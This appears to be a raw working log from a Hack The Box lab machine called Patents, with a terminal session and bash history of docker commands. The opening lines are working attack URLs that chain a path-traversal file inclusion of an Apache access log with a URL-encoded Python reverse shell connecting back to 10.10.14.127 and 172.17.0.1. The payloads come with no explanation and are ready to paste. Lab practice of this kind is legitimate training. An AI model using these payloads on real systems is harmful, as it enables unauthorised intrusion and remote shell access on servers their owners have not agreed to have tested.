http://patents.htb/getPatent_alphav1.0.php?id=..././..././..././..././..././var/log/apache2/access.log&cmd=python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%2210.10.14.127%22%2C443%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3B%20os.dup2%28s.fileno%28%29%2C2%29%3Bp%3Dsubprocess.call%28%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D%29%3B%27





http://127.0.0.1/getPatent_alphav1.0.php?id=..././..././..././..././..././var/log/apache2/access.log&cmd=python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%22172.17.0.1%22%2C2255%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3B%20os.dup2%28s.fileno%28%29%2C2%29%3Bp%3Dsubprocess.call%28%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D%29%3B%27


root@kali:~/HTB/Patents# 

root@kali:~/HTB/Patents# 
root@kali:~/HTB/Patents# ls
DOCKER_DEV  INJECT_LOG  LFI  python_inject_log_shell  reverseme.php  thing.tar
root@kali:~/HTB/Patents# v^C
root@kali:~/HTB/Patents# vi INJECT_LOG 
root@kali:~/HTB/Patents# 
root@kali:~/HTB/Patents# ls
DOCKER_DEV  INJECT_LOG  LFI  python_inject_log_shell  reverseme.php  thing.tar
root@kali:~/HTB/Patents# vi^C
root@kali:~/HTB/Patents# vi DOCKER_INSIDE_HACK
root@kali:~/HTB/Patents# 
root@kali:~/HTB/Patents# 
root@kali:~/HTB/Patents# 
root@kali:~/HTB/Patents# history | grep docker
  931  docker
  932  docker images
  938  docker build . -t test:latest
  939  docker images
  940  docker run -p 80:80 test:latest
  941  docker images
  942  docker ps
  943  docker run -p 80:80 test:latest
  944  service docker restart
  945  docker
  948  docker images
  949  docker run -i -t ubuntu:18.04 /bin/bash
  952  docker images
  953  docker inspect
  954  docker inspect ubuntu
  958  docker delete ubuntu
  960  docker rm ubuntu
  962  docker images
  963  docker rm 2eb2d388e1a2
  964  docker remove
  965  docker image
  966  docker image rm 2eb2d388e1a2
  967  docker image rm 2eb2d388e1a2 --force
  968  docker image rm 2eb2d388e1a2 force
  969  docker image rm 2eb2d388e1a2 -f
  971  docker images -a
  972  docker rmi d32e139a92a0
  973  docker images purge
  974  docker images
  975  docker images purge
  976  docker images
  977  docker rmi $(docker images -a -q)
  978  docker images
  980  docker rmi $(docker images -a -q) --force
  981  docker image
  982  docker images
 1000  docker build . -t test:latest
 1003  docker images
 1005  docker rmi $(docker images -a -q) --force
 1006  docker images
 1009  docker rmi $(docker images -a -q) --force
 1010  docker build . -t test:latest
 1011  docker images
 1012  docker ps
 1016  docker run -p 80:80 test:latest
 1019  docker images
 1020  history | grep docker
 1021  docker rmi $(docker images -a -q) --force
 1024  docker images
 1031  docker build . -t test.latest
 1032  docker images
 1033  docker run -p 80:80 test:latest &
 1034  docker images
 1037  docker run -p 80:80 test.latest &
 1058  history | grep docker
 1059  docker rmi $(docker images -a -q) --force
 1060  docker images
 1062  history | grep docker
 1063  docker build . -t test:latest
 1065  docker images
 1066  docker run -p 80:80 test:latest &
 1086  history | grep docker
 
   787  docker exec -it b3ec602c4582 /bin/bash
  791  service docker restart &
  796  history }| grep docker
  797  history | grep docker
  798  docker images
  799  docker ps
  800  docker exec -it d09e3e1f20e0
  801  docker exec -it d09e3e1f20e0 /bin/bash
  802  history | grep docker

